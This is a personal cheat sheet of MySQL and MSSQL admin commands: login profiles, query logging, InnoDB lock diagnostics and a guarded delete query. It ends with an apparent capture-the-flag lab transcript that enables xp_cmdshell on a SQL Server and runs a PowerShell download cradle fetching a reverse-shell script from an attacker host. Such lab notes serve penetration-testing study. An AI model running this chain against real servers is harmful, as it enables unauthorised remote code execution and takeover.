Run mysql with a profile

# Run the statement(s) in $SQL non-interactively, authenticating with the
# credentials stored under the "local1" login path (see mysql_config_editor).
mysql --login-path=local1 --execute="$SQL"

Config editor


# Store a new connection profile under the login path "local1". With --password
# given without a value the password is prompted for, so it never appears on the
# command line. The profile is written to ~/.mylogin.cnf in a reversibly-encoded
# form: the owner-only file permissions are what actually protect it.
mysql_config_editor set --login-path=local1 --host=127.0.0.1 --user=ubuntu --password

# List every stored profile (passwords are shown masked).
mysql_config_editor print --all

# Open an interactive session with the profile to verify it works.
mysql --login-path=local1 --silent

# Is anything listening on or connected to the MySQL port?
sudo lsof -P -n -i :3306

Debug: MySQL

Enable the general query log

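# Edit the server config. sudoedit copies the file to a temporary location,
# opens that copy in your editor as your own user, and writes it back as root
# when you save, so the editor (and any shell it can spawn) never runs as root.
sudoedit /etc/mysql/mysql.conf.d/mysqld.cnf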

# Uncomment the following two lines to enable the general query log.
# Both locations get rotated by the cronjob.
# Be aware that this log type is a performance killer.
# As of 5.1 you can enable the log at runtime (SET GLOBAL general_log = 'ON')
# instead of editing this file and restarting.
# NOTE(review): the general log records every statement the server receives,
# including the literal values inside them; keep the log file's permissions
# tight and switch the log off again once debugging is finished.
general_log_file        = /var/log/mysql/mysql.log
general_log             = 1

# Restart the server so the edited config is picked up.
sudo service mysql restart

# Follow the general log as new statements are written to it.
tail --follow /var/log/mysql/mysql.log

Locks table

`SHOW ENGINE INNODB STATUS` also shows the current transactions.

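-- InnoDB lock diagnostics for MySQL 5.x. The tables are schema-qualified so
-- the queries work from any current database. MySQL 8.0 removed INNODB_LOCKS
-- and INNODB_LOCK_WAITS; there use performance_schema.data_locks and
-- performance_schema.data_lock_waits instead.

-- Every lock wait in progress: which transaction is blocked by which.
SELECT
    REQUESTING_TRX_ID,
    REQUESTED_LOCK_ID,
    BLOCKING_TRX_ID,
    BLOCKING_LOCK_ID
FROM information_schema.INNODB_LOCK_WAITS;

-- Locks held by transactions that are blocking someone else.
SELECT *
FROM information_schema.INNODB_LOCKS
WHERE LOCK_TRX_ID IN (
    SELECT BLOCKING_TRX_ID
    FROM information_schema.INNODB_LOCK_WAITS
);

-- The same list written as a join. Unlike the IN form, a lock row is repeated
-- once per waiter when one transaction blocks several others.
SELECT l.*
FROM information_schema.INNODB_LOCKS AS l
INNER JOIN information_schema.INNODB_LOCK_WAITS AS w
    ON l.LOCK_TRX_ID = w.BLOCKING_TRX_ID;

-- Locks on one particular table. LOCK_TABLE stores the backtick-quoted name,
-- so the comparison value is a string literal that includes the backticks.
SELECT *
FROM information_schema.INNODB_LOCKS
WHERE LOCK_TABLE = '`db_name`.`table_name`';

-- Transactions currently waiting for a lock. TRX_STATE is a string, so the
-- value must be quoted; the bare words LOCK WAIT are a syntax error.
SELECT
    TRX_ID,
    TRX_REQUESTED_LOCK_ID,
    TRX_MYSQL_THREAD_ID,
    TRX_QUERY
FROM information_schema.INNODB_TRX
WHERE TRX_STATE = 'LOCK WAIT';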

Query from a list

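-- Resolve the application id once. A scalar subquery must return exactly one
-- row; MySQL raises "Subquery returns more than 1 row" otherwise, which is the
-- failure mode we want (better than deleting against the wrong application).
-- String literals use single quotes so the statements also run under
-- sql_mode ANSI_QUOTES, where double quotes denote identifiers.
SET @TMP_APP_ID := (
    SELECT DISTINCT id
    FROM `aaa`.`xxx`
    WHERE name LIKE '%whisky%'
);

-- Delete the pages belonging to this application, keeping any whose title
-- matches one of the excluded patterns. The original matched page_id with
-- FIND_IN_SET against a GROUP_CONCAT list; that list is silently truncated
-- at group_concat_max_len (1024 bytes by default), so a large id set would
-- leave rows behind. A plain IN subquery has no such limit and lets the
-- optimizer use an index on page_id if one exists.
DELETE FROM `aaa`.`pages`
WHERE page_id IN (
    SELECT s.id
    FROM `aaa`.`something` AS s
    WHERE s.application_id = @TMP_APP_ID
      AND s.title NOT LIKE '%whatever%'
      AND s.title NOT LIKE '%Politique%'
      AND s.title NOT LIKE '%contact%'
);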

MSSQL

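# Connect as "sa" to the server at IP. Leave out -P so mssql-cli prompts for
# the password: a password given on the command line ends up in the shell
# history and is visible to every local user in the process list.
mssql-cli -S IP -U sa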

Let’s try connecting to the SQL Server using Impacket’s mssqlclient.py.

┌──(kali㉿kali)-[§]
└─$ mssqlclient.py ARCHETYPE/[email protected] -windows-auth
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> SELECT IS_SRVROLEMEMBER('sysadmin');
              

-----------   

          1   

The current user is a member of the sysadmin server role (IS_SRVROLEMEMBER returned 1).

SQL> EXEC sp_configure 'Show Advanced Options', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure;
SQL> sp_configure;

xp_cmdshell                                     0             1              1             1   

SQL> EXEC sp_configure 'xp_cmdshell', 1
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure;

With xp_cmdshell enabled, OS commands can be run directly from the MSSQL session.

SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12:8000/reverse_shell_window.ps1\");"